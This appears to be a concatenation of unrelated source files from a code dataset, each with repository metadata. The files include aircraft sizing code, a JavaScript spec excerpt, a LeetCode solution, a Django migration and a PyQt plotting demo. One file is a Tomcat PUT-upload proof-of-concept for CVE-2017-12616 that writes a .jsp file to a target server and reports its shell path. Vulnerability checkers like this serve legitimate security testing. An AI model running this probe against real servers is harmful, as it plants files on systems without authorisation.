p_w = self.coefficient * (self.q / (self.beta * self.w_s) * cd + dh_dt / self.v + dV_dt / self.g0)
return p_w
def cruise(self):
p_w = ConstrainsAnalysis_Mattingly_Method_with_DP.master_equation(self, n=1, dh_dt=0, dV_dt=0)
return p_w
def climb(self, roc):
p_w = ConstrainsAnalysis_Mattingly_Method_with_DP.master_equation(self, n=1, dh_dt=roc, dV_dt=0)
return p_w
def level_turn(self, turn_rate=3, v=100):
"""
assume 2 min for 360 degree turn, which is 3 degree/seconds
assume turn at 300 knots, which is about 150 m/s
"""
load_factor = (1 + ((turn_rate * np.pi / 180) * v / self.g0) ** 2) ** 0.5
p_w = ConstrainsAnalysis_Mattingly_Method_with_DP.master_equation(self, n=load_factor, dh_dt=0, dV_dt=0)
return p_w
def take_off(self):
"""
A320neo take-off speed is about 150 knots, which is about 75 m/s
required runway length is about 2000 m
K_TO is a constant greater than one set to 1.2 (generally specified by appropriate flying regulations)
"""
Cl_max_to = 2.3 # 2.3
K_TO = 1.2 # V_TO / V_stall
s_G = 1266
p_w = 2 / 3 * self.coefficient / self.v * self.beta * K_TO ** 2 / (
s_G * self.rho * self.g0 * Cl_max_to) * self.w_s ** (
3 / 2)
return p_w
def stall_speed(self, V_stall_to=65, Cl_max_to=2.3):
V_stall_ld = 62
Cl_max_ld = 2.87
W_S_1 = 1 / 2 * self.rho * V_stall_to ** 2 * (Cl_max_to + self.delta_cl)
W_S_2 = 1 / 2 * self.rho * V_stall_ld ** 2 * (Cl_max_ld + self.delta_cl)
W_S = min(W_S_1, W_S_2)
return W_S
def service_ceiling(self, roc=0.5):
p_w = ConstrainsAnalysis_Mattingly_Method_with_DP.master_equation(self, n=1, dh_dt=roc, dV_dt=0)
return p_w
allFuncs = [take_off, stall_speed, cruise, service_ceiling, level_turn, climb]
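
# A minimal usage sketch (hypothetical numbers; assumes the Sizing_Method
# package imports above resolve):
#   problem = ConstrainsAnalysis_Mattingly_Method_with_DP(
#       altitude=11300, velocity=230, beta=0.948, wing_load=5000.0)
#   print(problem.cruise())       # required power loading P_SL/W_TO, in W/N
#   print(problem.stall_speed())  # max allowable wing loading, in N/m**2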
class ConstrainsAnalysis_Gudmundsson_Method_with_DP:
"""This is a power-based master constraints analysis based on Gudmundsson_method"""
def __init__(self, altitude, velocity, beta, wing_load, Hp=0.2, number_of_motor=12, e=0.75, AR=10.3):
"""
        :param Hp: power fraction of the i-th power path (P_motor/P_total)
:param beta: weight fraction
:param e: wing planform efficiency factor is between 0.75 and 0.85, no more than 1
:param AR: wing aspect ratio, normally between 7 and 10
:return:
power load: P_WTO
"""
self.h = altitude
self.v = velocity
self.beta = beta
self.w_s = wing_load
self.g0 = 9.80665
self.beta = beta
self.hp = Hp
self.n = number_of_motor
self.rho = atm.atmosphere(geometric_altitude=self.h).density()
# power lapse ratio
self.alpha = thrust_lapse.thrust_lapse_calculation(altitude=self.h,
velocity=self.v).high_bypass_ratio_turbofan()
h = 2.43 # height of winglets
b = 35.8
ar_corr = AR * (1 + 1.9 * h / b) # equation 9-88, If the wing has winglets the aspect ratio should be corrected
self.k = 1 / (np.pi * ar_corr * e)
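        # with the defaults (h=2.43, b=35.8, AR=10.3, e=0.75) this evaluates to
        # ar_corr = 10.3*(1 + 1.9*2.43/35.8) ~= 11.63 and k = 1/(pi*11.63*0.75) ~= 0.0365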
self.coefficient = (1-self.hp) * self.beta * self.v / self.alpha
# Estimation of ΔCL and ΔCD
pd = ad.aerodynamics_with_pd(self.h, self.v, Hp=self.hp, n=self.n, W_S=self.w_s)
self.q = 0.5 * self.rho * self.v ** 2
cl = self.beta * self.w_s / self.q
self.delta_cl = pd.delta_lift_coefficient(cl)
self.delta_cd0 = pd.delta_CD_0()
# TABLE 3-1 Typical Aerodynamic Characteristics of Selected Classes of Aircraft
cd_min = 0.02
cd_to = 0.03
cl_to = 0.8
self.v_to = 68
self.s_g = 1480
self.mu = 0.04
self.cd_min = cd_min + self.delta_cd0
self.cl = cl + self.delta_cl
self.cd_to = cd_to + self.delta_cd0
self.cl_to = cl_to + self.delta_cl
def cruise(self):
p_w = self.q / self.w_s * (self.cd_min + self.k * self.cl ** 2)
return p_w * self.coefficient
def climb(self, roc):
p_w = roc / self.v + self.q * self.cd_min / self.w_s + self.k * self.cl
return p_w * self.coefficient
def level_turn(self, turn_rate=3, v=100):
"""
assume 2 min for 360 degree turn, which is 3 degree/seconds
assume turn at 100 m/s
"""
load_factor = (1 + ((turn_rate * np.pi / 180) * v / self.g0) ** 2) ** 0.5
q = 0.5 * self.rho * v ** 2
p_w = q / self.w_s * (self.cd_min + self.k * (load_factor / q * self.w_s + self.delta_cl) ** 2)
return p_w * self.coefficient
def take_off(self):
q = self.q / 2
p_w = self.v_to ** 2 / (2 * self.g0 * self.s_g) + q * self.cd_to / self.w_s + self.mu * (
1 - q * self.cl_to / self.w_s)
return p_w * self.coefficient
def service_ceiling(self, roc=0.5):
vy = (2 / self.rho * self.w_s * (self.k / (3 * self.cd_min)) ** 0.5) ** 0.5
q = 0.5 * self.rho * vy ** 2
p_w = roc / vy + q / self.w_s * (self.cd_min + self.k * (self.w_s / q + self.delta_cl) ** 2)
# p_w = roc / (2 / self.rho * self.w_s * (self.k / (3 * self.cd_min)) ** 0.5) ** 0.5 + 4 * (
# self.k * self.cd_min / 3) ** 0.5
return p_w * self.coefficient
def stall_speed(self, V_stall_to=65, Cl_max_to=2.3):
V_stall_ld = 62
Cl_max_ld = 2.87
W_S_1 = 1 / 2 * self.rho * V_stall_to ** 2 * (Cl_max_to + self.delta_cl)
W_S_2 = 1 / 2 * self.rho * V_stall_ld ** 2 * (Cl_max_ld + self.delta_cl)
W_S = min(W_S_1, W_S_2)
return W_S
allFuncs = [take_off, stall_speed, cruise, service_ceiling, level_turn, climb]
if __name__ == "__main__":
n = 100
w_s = np.linspace(100, 9000, n)
constrains_name = ['take off', 'stall speed', 'cruise', 'service ceiling', 'level turn @3000m',
'climb @S-L', 'climb @3000m', 'climb @7000m']
constrains = np.array([[0, 68, 0.988], [0, 80, 1], [11300, 230, 0.948],
[11900, 230, 0.78], [3000, 100, 0.984], [0, 100, 0.984],
[3000, 200, 0.975], [7000, 230, 0.96]])
color = ['c', 'k', 'b', 'g', 'y', 'plum', 'violet', 'm']
label = ['feasible region with PD', 'feasible region with PD', 'feasible region Gudmundsson',
'feasible region without PD', 'feasible region without PD', 'feasible region Mattingly']
m = constrains.shape[0]
p_w = np.zeros([2 * m, n])
for k in range(3):
plt.figure(figsize=(12, 8))
for i in range(m):
for j in range(n):
h = constrains[i, 0]
v = constrains[i, 1]
beta = constrains[i, 2]
if k == 0:
problem1 = ConstrainsAnalysis_Gudmundsson_Method_with_DP(h, v, beta, w_s[j])
problem2 = ca.ConstrainsAnalysis_Gudmundsson_Method(h, v, beta, w_s[j])
plt.title(r'Constraint Analysis: $\bf{Gudmundsson-Method}$ - Normalized to Sea Level')
elif k == 1:
problem1 = ConstrainsAnalysis_Mattingly_Method_with_DP(h, v, beta, w_s[j])
problem2 = ca.ConstrainsAnalysis_Mattingly_Method(h, v, beta, w_s[j])
plt.title(r'Constraint Analysis: $\bf{Mattingly-Method}$ - Normalized to Sea Level')
else:
problem1 = ConstrainsAnalysis_Gudmundsson_Method_with_DP(h, v, beta, w_s[j])
problem2 = ConstrainsAnalysis_Mattingly_Method_with_DP(h, v, beta, w_s[j])
plt.title(r'Constraint Analysis: $\bf{with}$ $\bf{DP}$ - Normalized to Sea Level')
if i >= 5:
p_w[i, j] = problem1.allFuncs[-1](problem1, roc=15 - 5 * (i - 5))
p_w[i + m, j] = problem2.allFuncs[-1](problem2, roc=15 - 5 * (i - 5))
else:
p_w[i, j] = problem1.allFuncs[i](problem1)
p_w[i + m, j] = problem2.allFuncs[i](problem2)
if i == 1:
l1a, = plt.plot(p_w[i, :], np.linspace(0, 250, n), color=color[i], label=constrains_name[i])
l1b, = plt.plot(p_w[i + m, :], np.linspace(0, 250, n), color=color[i], linestyle='--')
if k != 2:
l1 = plt.legend([l1a, l1b], ['with DP', 'without DP'], loc="upper right")
else:
l1 = plt.legend([l1a, l1b], ['Gudmundsson method', 'Mattingly method'], loc="upper right")
else:
plt.plot(w_s, p_w[i, :], color=color[i], label=constrains_name[i])
plt.plot(w_s, p_w[i + m, :], color=color[i], linestyle='--')
        def func(x, a0, a1, a2, a3, a4, a5):
            # cubic polynomial plus sinusoidal terms used to smooth the stall-speed boundary;
            # six coefficients, matching the six popt values passed in below
            return a0 + a1*x + a2*x**2 + a3*x**3 + a4*np.sin(x) + a5*np.cos(x)
            #return a * np.exp(b * x) + c
if i == 1:
xdata, ydata = p_w[i, :], np.linspace(0, 250, n)
popt, _ = curve_fit(func, xdata, ydata)
p_w[i, :] = func(w_s, popt[0], popt[1], popt[2], popt[3], popt[4], popt[5])
if k != 2:
p_w[1 + m, :] = 10 ** 10 * (w_s - p_w[1 + m, 2])
else:
def func(x, a, b, c, d, e):
return a + b*x + c*x**2 + d*x**3 + e*x**4
#return a * np.exp(b * x) + c
xdata, ydata = p_w[m+1, :], np.linspace(0, 250, n)
popt, _ = curve_fit(func, xdata, ydata)
p_w[m+1, :] = func(w_s, popt[0], popt[1],
popt[2], popt[3], popt[4])
plt.fill_between(w_s, np.amax(p_w[0:m, :], axis=0), 200, color='b', alpha=0.25,
label=label[k])
plt.fill_between(w_s, np.amax(p_w[m:2 * m, :], axis=0), 200, color='r', alpha=0.25,
label=label[k + 3])
plt.xlabel('Wing Load: $W_{TO}$/S (N/${m^2}$)')
plt.ylabel('Power-to-Load: $P_{SL}$/$W_{TO}$ (W/N)')
plt.legend(bbox_to_anchor=(1.002, 1), loc="upper left")
plt.gca().add_artist(l1)
plt.xlim(100, 9000)
plt.ylim(0, 200)
plt.tight_layout()
plt.grid()
plt.show()
| [
"[email protected]"
] | |
2f9e3f9b1f607d3f89fc3e056f19fcccad2f74fe | 28a462a28f443c285ca5efec181ebe36b147c167 | /tests/compile/basic/recent/String.prototype.startsWith.spec | ba62e090c26d2ee9be97ca1a97a2010796ad2856 | [
"BSD-3-Clause",
"BSD-2-Clause"
] | permissive | kaist-plrg/jstar | 63e71f9156860dc21cccc33a9f6c638dfee448ea | 1282919127ea18a7e40c7a55e63a1ddaaf7d9db4 | refs/heads/main | 2022-07-22T08:12:34.947712 | 2022-02-27T04:19:33 | 2022-02-27T11:06:14 | 384,045,526 | 6 | 4 | NOASSERTION | 2022-02-27T11:05:26 | 2021-07-08T07:53:21 | Python | UTF-8 | Python | false | false | 884 | spec | 1. Let _O_ be ? RequireObjectCoercible(*this* value).
1. Let _S_ be ? ToString(_O_).
1. Let _isRegExp_ be ? IsRegExp(_searchString_).
1. If _isRegExp_ is *true*, throw a *TypeError* exception.
1. Let _searchStr_ be ? ToString(_searchString_).
1. Let _len_ be the length of _S_.
1. If _position_ is *undefined*, let _pos_ be 0; else let _pos_ be ? ToIntegerOrInfinity(_position_).
1. Let _start_ be the result of clamping _pos_ between 0 and _len_.
1. Let _searchLength_ be the length of _searchStr_.
1. If _searchLength_ = 0, return *true*.
1. Let _end_ be _start_ + _searchLength_.
1. If _end_ > _len_, return *false*.
1. Let _substring_ be the substring of _S_ from _start_ to _end_.
1. Return ! SameValueNonNumeric(_substring_, _searchStr_).
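
A minimal Python sketch of the algorithm above (illustrative only: plain Python
str values stand in for spec Strings, and the RequireObjectCoercible, IsRegExp
and ToString coercion steps are omitted):

  def starts_with(s, search, position=None):
      pos = 0 if position is None else int(position)  # ToIntegerOrInfinity, simplified
      start = min(max(pos, 0), len(s))                 # clamp pos between 0 and len
      if len(search) == 0:                             # searchLength = 0 => *true*
          return True
      end = start + len(search)
      if end > len(s):
          return False
      return s[start:end] == search                    # SameValueNonNumeric on Strings
 | [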
"[email protected]"
] | |
9d0b0a941398fd991247b3a0ec96412244d364c5 | 30fe7671b60825a909428a30e3793bdf16eaaf29 | /.metadata/.plugins/org.eclipse.core.resources/.history/9a/f0d15008ccf800161174a93fd5908e78 | 96f863b8b89de32901e8cf640c731bc4ebefeb38 | [] | no_license | abigdream84/PythonStudy | 0fc7a3b6b4a03a293b850d0ed12d5472483c4fb1 | 059274d3ba6f34b62ff111cda3fb263bd6ca8bcb | refs/heads/master | 2021-01-13T04:42:04.306730 | 2017-03-03T14:54:16 | 2017-03-03T14:54:16 | 79,123,274 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 983 | #!/usr/bin/env python
#coding:UTF-8
from audit_demo.utility.MySqlHelper import MySqlHelper
class g_table(object):
def __init__(self):
self.__helper = MySqlHelper()
def add_grp(self,gpname):
sql = 'insert into g_table(g_name) values(%s)'
try:
self.__helper.insert(sql,gpname)
return True
except Exception as e:
print(e)
return False
    def get_grp(self,gpname):
        sql = 'select g_name from g_table where g_name = %s'
        g_id = None   # avoid a NameError below if the query raises
        try:
            g_id = self.__helper.select(sql,gpname)
        except Exception as e:
            print(e)
        return g_id
def upd_grp(self,g_name_old,g_name_new):
sql = 'update g_table set g_name = %s where g_name = %s'
params = (g_name_new, g_name_old)
try:
self.__helper.update(sql,params)
except Exception as e:
print(e)
t=g_table()
t.add_grp('gp1')
| [
"[email protected]"
] | ||
d78e9b91414cf74ab0da36fd5f6de8f911a9e0cd | 53eee7eb899cb518983008532257037fb89def13 | /2579.count-total-number-of-colored-cells.py | eb2d7d5de90aeac6f2c95bbec4eef4b247461260 | [] | no_license | chenxu0602/LeetCode | 0deb3041a66cb15e12ed4585bbe0fefce5dc6b26 | 3dc5af2bc870fcc8f2142130fcd2b7cab8733151 | refs/heads/master | 2023-07-05T19:26:21.608123 | 2023-07-02T08:35:35 | 2023-07-02T08:35:35 | 233,351,978 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 273 | py | #
# @lc app=leetcode id=2579 lang=python3
#
# [2579] Count Total Number of Colored Cells
#
# @lc code=start
class Solution:
def coloredCells(self, n: int) -> int:
# return n * n + (n - 1) * (n - 1)
return 2 * n * (n - 1) + 1
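
    # Why 2*n*(n-1) + 1: after n minutes the colored cells form a diamond with a
    # center cell plus rings of 4*k cells for k = 1..n-1, i.e.
    # 1 + 4*(1 + 2 + ... + (n-1)) = 1 + 2*n*(n-1), which also equals the
    # commented-out closed form n**2 + (n-1)**2.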
# @lc code=end
| [
"[email protected]"
] | |
3c74be0064501659bed8cf392ce9d5f5ca0414a4 | bede337b5ee193bb5669c855b70a78d929dc5ae8 | /apps/one_password.py | ca9110f9a15ed7b774c7eb7f446788b5cfa0d019 | [
"0BSD"
] | permissive | dwiel/talon-user | ffe83c05e054626431fe12c14dbfe850950fa4c4 | 559617135408ea2ceafaef54564438405546f255 | refs/heads/master | 2020-09-12T22:58:36.575833 | 2019-11-19T17:12:05 | 2019-11-19T17:12:05 | 222,585,938 | 0 | 0 | NOASSERTION | 2019-11-19T02:00:20 | 2019-11-19T02:00:19 | null | UTF-8 | Python | false | false | 217 | py | from talon import ctrl
from talon.voice import Context, Key
from ..utils import text, delay
ctx = Context("1password")
ctx.keymap({
"password [<dgndictation>] [over]": [Key("shift-cmd-\\"), delay(0.2), text],
}) | [
"[email protected]"
] | |
050f2631f6b47527fb3ebdc876e7b392d2199011 | 3ffb51fa2241cba9c9680ab01f8da4057861f849 | /collezione/migrations/0023_auto_20181102_1526.py | a6e5117963a13b170e60c828a4b8d205856cf3f5 | [] | no_license | mions1/Euros | a663d9e3a38de56c51091233e6b4fc6db3147fb2 | faa74139e178b2c9dc868a536518715bed91c676 | refs/heads/master | 2020-04-08T00:12:45.713416 | 2018-11-23T14:35:45 | 2018-11-23T14:35:45 | 158,842,175 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 755 | py | # Generated by Django 2.1.2 on 2018-11-02 15:26
from django.db import migrations, models
import django.utils.timezone
class Migration(migrations.Migration):
dependencies = [
('collezione', '0022_auto_20181030_2030'),
]
operations = [
migrations.AddField(
model_name='acquisto',
name='prezzo',
field=models.FloatField(default=0.0),
),
migrations.AlterField(
model_name='acquisto',
name='data',
field=models.DateField(default=django.utils.timezone.now),
),
migrations.AlterField(
model_name='possiede',
name='prezzo',
field=models.FloatField(default=0.0, null=True),
),
]
| [
"[email protected]"
] | |
e5fb1f72e9850b7e778c6e302a06e49f892d630d | 6c219c027c7d0ef454bdeac196bd773e8b95d602 | /system/tomcat/tomcat_put_exec.py | 5d95b87eb442bce192ffbb30043ed14ef2a86d4f | [] | no_license | aStrowxyu/pocscan | 663f3a3458140e1bce7b4dc3702c6014a4c9ac92 | 08c7e7454c6b7c601bc54c21172c4788312603b1 | refs/heads/master | 2020-04-19T10:00:56.569105 | 2019-01-29T09:31:31 | 2019-01-29T09:31:31 | 168,127,418 | 4 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,561 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
name: Tomcat代码执行漏洞(CVE-2017-12616)
referer: https://mp.weixin.qq.com/s/dgWT3Cgf1mQs-IYxeID_Mw
author: Lucifer
description: 当 Tomcat 运行在 Windows 主机上,且启用了 HTTP PUT 请求方法(例如,将 readonly 初始化参数由默认值设置为 false),攻击者将有可能可通过精心构造的攻击请求向服务器上传包含任意代码的 JSP 文件。之后,JSP 文件中的代码将能被服务器执行。
影响版本:Apache Tomcat 7.0.0 - 7.0.79(7.0.81修复不完全)。
'''
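# The two probes below use well-known JspServlet mapping bypasses on Windows:
# appending "::$DATA" (an NTFS alternate data stream name) or a trailing "/"
# to the .jsp filename lets the PUT create a file that Tomcat will later
# compile and execute as a JSP.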
import sys
import time
import hashlib
import requests
import datetime
import warnings
from termcolor import cprint
class tomcat_put_exec_BaseVerify:
def __init__(self, url):
self.url = url
def run(self):
headers = {
"User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
}
post_data = "thisisashell"
time_stamp = time.mktime(datetime.datetime.now().timetuple())
m = hashlib.md5(str(time_stamp).encode(encoding='utf-8'))
md5_str = m.hexdigest()
vulnurl = self.url + "/" + md5_str +".jsp::$DATA"
try:
req = requests.put(vulnurl, data=post_data, headers=headers, timeout=10, verify=False)
if req.status_code == 201:
cprint("[+]存在Tomcat代码执行漏洞...(高危)\tpayload: "+vulnurl+"\tshellpath: "+self.url+"/"+md5_str+".jsp", "red")
else:
cprint("[-]不存在tomcat_put_exec漏洞", "white", "on_grey")
        except Exception:
            cprint("[-] "+__file__+"====>vulnerability probably absent", "cyan")
time_stamp = time.mktime(datetime.datetime.now().timetuple())
m = hashlib.md5(str(time_stamp).encode(encoding='utf-8'))
md5_str = m.hexdigest()
vulnurl = self.url + "/" + md5_str +".jsp/"
try:
req = requests.put(vulnurl, data=post_data, headers=headers, timeout=10, verify=False)
if req.status_code == 201:
cprint("[+]存在Tomcat代码执行漏洞...(高危)\tpayload: "+vulnurl+"\tshellpath: "+self.url+"/"+md5_str+".jsp", "red")
else:
cprint("[-]不存在tomcat_put_exec漏洞", "white", "on_grey")
        except Exception:
            cprint("[-] "+__file__+"====>vulnerability probably absent", "cyan")
if __name__ == "__main__":
warnings.filterwarnings("ignore")
testVuln = tomcat_put_exec_BaseVerify(sys.argv[1])
testVuln.run()
| [
"[email protected]"
] | |
99d4e37e0d66355af8f0a5232e0a8b75df8ecdd0 | 4539b71e48ec47526f7f3834098e491383096fcd | /DemoUIonly-PythonQt/chap14matplotlib/Demo14_2Detail/myMainWindow.py | d7a681172d064cd1507c14f78d451967de8ba6bb | [] | no_license | likeke201/qt_code | e4d5ae8894153ae7a92e4ffdc01612c0aeb7510b | e0244558764bbbcc3646e828a907cdb1cdee6225 | refs/heads/master | 2022-12-06T11:23:38.068457 | 2020-08-30T05:16:12 | 2020-08-30T05:16:12 | 291,404,725 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 17,229 | py | # -*- coding: utf-8 -*-
import sys
from PyQt5.QtWidgets import (QApplication, QMainWindow,
QSplitter, QColorDialog, QLabel, QComboBox)
from PyQt5.QtCore import pyqtSlot,Qt
from PyQt5.QtGui import QColor
import numpy as np
import matplotlib as mpl
import matplotlib.style as mplStyle # a style-handling submodule
from matplotlib.backends.backend_qt5agg import (FigureCanvas,
NavigationToolbar2QT as NavigationToolbar)
from ui_MainWindow import Ui_MainWindow
class QmyMainWindow(QMainWindow):
def __init__(self, parent=None):
      super().__init__(parent)   # call the base class constructor to create the window
      self.ui=Ui_MainWindow()    # create the UI object
      self.ui.setupUi(self)      # build the UI
      self.setWindowTitle("Demo14_2, operations on the main plotting objects")
      mplStyle.use("classic")    # apply a style; must be called before plotting, and the font must be changed before Chinese text can render
      mpl.rcParams['font.sans-serif']=['KaiTi','SimHei'] # render Chinese text in KaiTi; Chinese fonts ignore bold/italic and similar settings
      mpl.rcParams['font.size']=12
      ## some fonts bundled with Windows:
      ## SimHei, SimSun, NSimSun, FangSong, KaiTi
      mpl.rcParams['axes.unicode_minus'] =False  # use a plain hyphen instead of the unicode minus sign
      pass
##  ==============custom helper functions========================
   def __createFigure(self):
      pass
   def __getMag(self,w,zta=0.2,wn=1.0):   ## compute the magnitude (frequency response) data
w2=w*w
a1=1-w2/(wn*wn)
b1=a1*a1
b2=4*zta*zta/(wn*wn)*w2
b=np.sqrt(b1+b2)
      mag=-20*np.log10(b) # in dB
return mag
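
   # __getMag above evaluates the magnitude response of the standard
   # second-order system H(jw) = 1/(1 - (w/wn)**2 + j*2*zta*(w/wn)):
   # b is the magnitude of the denominator, so mag = -20*log10(b)
   # equals 20*log10|H(jw)| in dB.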
   def __drawFig2X1(self):   ## initialize the plots
      pass
##  ==============event handler functions==========================
##  ==========slots auto-connected by connectSlotsByName()============
##=====ToolBox group 1: === features in the "Figure operations" page ================
##=======1.1 suptitle, the figure title
   def __setFig_suptitle(self,refreshDraw=True): # set the suptitle
      pass
   @pyqtSlot(bool)      ##"1.1 suptitle" groupBox
   def on_groupBox_suptitle_clicked(self,checked):
      pass
   @pyqtSlot()          ##"set title" button
   def on_btnFig_Title_clicked(self):
      self.__setFig_suptitle()
   @pyqtSlot(int)       ## font size
   def on_spinFig_Fontsize_valueChanged(self,arg1):
      self.__setFig_suptitle()
   @pyqtSlot(bool)      ## bold
   def on_chkBoxFig_Bold_clicked(self,checked):
      self.__setFig_suptitle()
   @pyqtSlot(bool)      ## italic
   def on_chkBoxFig_Italic_clicked(self,checked):
      self.__setFig_suptitle()
   @pyqtSlot()          ## text color
   def on_btnFig_TitleColor_clicked(self):
      pass
   @pyqtSlot()          ## text background color
   def on_btnFig_TitleBackColor_clicked(self):
      pass
##=======1.2 background and frame
   @pyqtSlot(bool)      ##set_frameon, show the background and frame
   def on_chkBoxFig_FrameOn_clicked(self,checked):
      pass
   @pyqtSlot()          ##set_facecolor, set the background color
   def on_btnFig_FaceColor_clicked(self):
      pass
   @pyqtSlot(str)       ## set the style
   def on_comboFig_Style_currentIndexChanged(self,arg1):
      pass
##=====1.3 margins and subplot spacing
   @pyqtSlot()          ## tight_layout, experimental feature
   def on_btnFigure_tightLayout_clicked(self):
      self.__fig.tight_layout()     # apply tight_layout once to all subplots
      self.__fig.canvas.draw()   # refresh
@pyqtSlot(float) ##left margin
def on_spinFig_marginLeft_valueChanged(self,value):
self.__fig.subplots_adjust(left=value)
self.__fig.canvas.draw()
@pyqtSlot(float) ##right margin
def on_spinFig_marginRight_valueChanged(self,value):
self.__fig.subplots_adjust(right=value)
self.__fig.canvas.draw()
@pyqtSlot(float) ##bottom margin
def on_spinFig_marginBottom_valueChanged(self,value):
self.__fig.subplots_adjust(bottom=value)
self.__fig.canvas.draw()
@pyqtSlot(float) ##top margin
def on_spinFig_marginTop_valueChanged(self,value):
self.__fig.subplots_adjust(top=value)
self.__fig.canvas.draw()
@pyqtSlot(float) ## wspace
def on_spinFig_wspace_valueChanged(self,value):
self.__fig.subplots_adjust(wspace=value)
self.__fig.canvas.draw()
@pyqtSlot(float) ## hspace
def on_spinFig_hspace_valueChanged(self,value):
self.__fig.subplots_adjust(hspace=value)
self.__fig.canvas.draw()
##=====ToolBox group 2: features in the "Axes (subplot) operations" page ================
   @pyqtSlot(bool)      ## subplot visibility
   def on_chkBoxAxes_Visible_clicked(self,checked):
      pass
##=======2.1 subplot title
   def __setAxesTitle(self):
      pass
   @pyqtSlot(bool)      ##"subplot title" GroupBox--CheckBox
   def on_groupBox_AxesTitle_clicked(self,checked):
      pass
   @pyqtSlot()          ##"set title" button
   def on_btnAxes_Title_clicked(self):
      self.__setAxesTitle()     # set the title
   @pyqtSlot(int)       ## font size
   def on_spinAxes_Fontsize_valueChanged(self,arg1):
      self.__setAxesTitle()
   @pyqtSlot(bool)      ## bold
   def on_chkBoxAxes_Bold_clicked(self,checked):
      self.__setAxesTitle()
   @pyqtSlot(bool)      ## italic
   def on_chkBoxAxes_Italic_clicked(self,checked):
      self.__setAxesTitle()
   @pyqtSlot()          ## text color
   def on_btnAxes_TitleColor_clicked(self):
      pass
   @pyqtSlot()          ## text background color
   def on_btnAxes_TitleBackColor_clicked(self):
      pass
##=======2.2 subplot appearance
   @pyqtSlot(bool)      ##set_frame_on, whether to show the background color
   def on_chkBoxAxes_FrameOn_clicked(self,checked):
      pass
   @pyqtSlot()          ##set_facecolor, set the background color
   def on_btnAxes_FaceColor_clicked(self):
      pass
   @pyqtSlot(bool)      ##grid(), set X grid visibility
   def on_chkBoxAxes_GridX_clicked(self,checked):
      pass
   @pyqtSlot(bool)      ##grid(), set Y grid visibility
   def on_chkBoxAxes_GridY_clicked(self,checked):
      pass
   @pyqtSlot(bool)      ##set_axis_on and set_axis_off, show/hide the axes
   def on_chkBoxAxes_AxisOn_clicked(self,checked):
      pass
   @pyqtSlot(bool)      ## minorticks_on and minorticks_off, show/hide minor ticks and grids
   def on_chkBoxAxes_MinorTicksOn_clicked(self,checked):
      pass
##======2.3 legend
   @pyqtSlot(bool)      ## legend visible
   def on_groupBox_AexLegend_clicked(self,checked):
      pass
   @pyqtSlot(int)       ## legend location
   def on_combo_LegendLoc_currentIndexChanged(self,index):
      pass
   @pyqtSlot(bool)      ## legend draggable
   def on_chkBoxLegend_Dragable_clicked(self,checked):
      pass
   @pyqtSlot()          ## regenerate the legend
   def on_btnLegend_regenerate_clicked(self):
      pass
##=====ToolBox group 3: features in the "subplot curve settings" page ================
##======3.1 choose the curve to operate on
   @pyqtSlot(int)       ## select the current curve
   def on_comboAxes_Lines_currentIndexChanged(self,index):
      pass
##======3.2 curve appearance
   @pyqtSlot(bool)      ## curve visible
   def on_groupBox_LineSeries_clicked(self,checked):
      pass
   @pyqtSlot(str)       ##set_linestyle
   def on_comboSeries_LineStyle_currentIndexChanged(self,arg1):
      pass
   @pyqtSlot(int)       ## line width
   def on_spinSeries_LineWidth_valueChanged(self,arg1):
      pass
   @pyqtSlot(str)       ##set_drawstyle()
   def on_comboSeries_DrawStyle_currentIndexChanged(self,arg1):
      pass
   @pyqtSlot()          ## set the curve color
   def on_btnSeries_LineColor_clicked(self):
      pass
##======3.3 markers
   @pyqtSlot(bool)      ## markers visible
   def on_groupBox_Marker_clicked(self,checked):
      pass
   @pyqtSlot(str)       ##set_marker, marker shape
   def on_comboMarker_Shape_currentIndexChanged(self,arg1):
      pass
   @pyqtSlot(int)       ##set_markersize, marker size
   def on_spinMarker_Size_valueChanged(self,arg1):
      pass
   @pyqtSlot()          ## marker color
   def on_btnMarker_Color_clicked(self):
      pass
   @pyqtSlot(int)       ##set_markeredgewidth, marker edge width
   def on_spinMarker_EdgeWidth_valueChanged(self,arg1):
      pass
   @pyqtSlot()          ##set_markeredgecolor, marker edge color
   def on_btnMarker_EdgeColor_clicked(self):
      pass
##=====ToolBox group 4: === features in the "X axis settings" page ================
   @pyqtSlot(bool)      ##axisX visibility, including label, ticks and ticklabels
   def on_groupBox_AxisX_clicked(self,checked):
      pass
##======4.1 data range======
   @pyqtSlot()          ## set_xbound sets the range; unlike set_xlim it ignores axis inversion
   def on_btnAxisX_setBound_clicked(self):
      pass
   @pyqtSlot()          ## invert_xaxis, toggle inversion
   def on_chkBoxAxisX_Invert_clicked(self):
      pass
   @pyqtSlot(str)       ## set the axis scale
   def on_comboAxisX_Scale_currentIndexChanged(self,arg1):
      pass
##==========4.2 X axis label
   def __setAxisX_Label(self,refreshDraw=True):
      pass
   @pyqtSlot(bool)      ##X axis label visibility
   def on_groupBox_AxisXLabel_clicked(self,checked):
      pass
   @pyqtSlot()          ## set the X axis label
   def on_btnAxisX_setLabel_clicked(self):
      self.__setAxisX_Label()
   @pyqtSlot(int)       ## font size
   def on_spinAxisX_LabelFontsize_valueChanged(self,arg1):
      self.__setAxisX_Label()
   @pyqtSlot(bool)      ## bold
   def on_chkBoxAxisX_LabelBold_clicked(self,checked):
      self.__setAxisX_Label()
   @pyqtSlot(bool)      ## italic
   def on_chkBoxAxisX_LabelItalic_clicked(self,checked):
      self.__setAxisX_Label()
   @pyqtSlot()          ## text color
   def on_btnAxisX_LabelColor_clicked(self):
      color=QColorDialog.getColor()   #QColor
      if color.isValid():
         r,g,b,a=color.getRgbF()  #getRgbF(self) -> Tuple[float, float, float, float]
         objText=self.__setAxisX_Label(False)
         objText.set_color((r,g,b,a))  # text color
         self.__fig.canvas.draw()
##======4.3 X axis major tick labels
   @pyqtSlot(bool)      ##"4.3 major tick labels" GroupBox, tick label visibility
   def on_groupBoxAxisX_TickLabel_clicked(self,checked):
      pass
   @pyqtSlot()          ## set the label format
   def on_btnAxisX_TickLabFormat_clicked(self):
      pass
   @pyqtSlot()          ## text color
   def on_btnAxisX_TickLabColor_clicked(self):
      pass
   @pyqtSlot(int)       ## font size
   def on_spinAxisX_TickLabelFontsize_valueChanged(self,arg1):
      pass
   @pyqtSlot(bool)      ## bottom axis major ticklabel
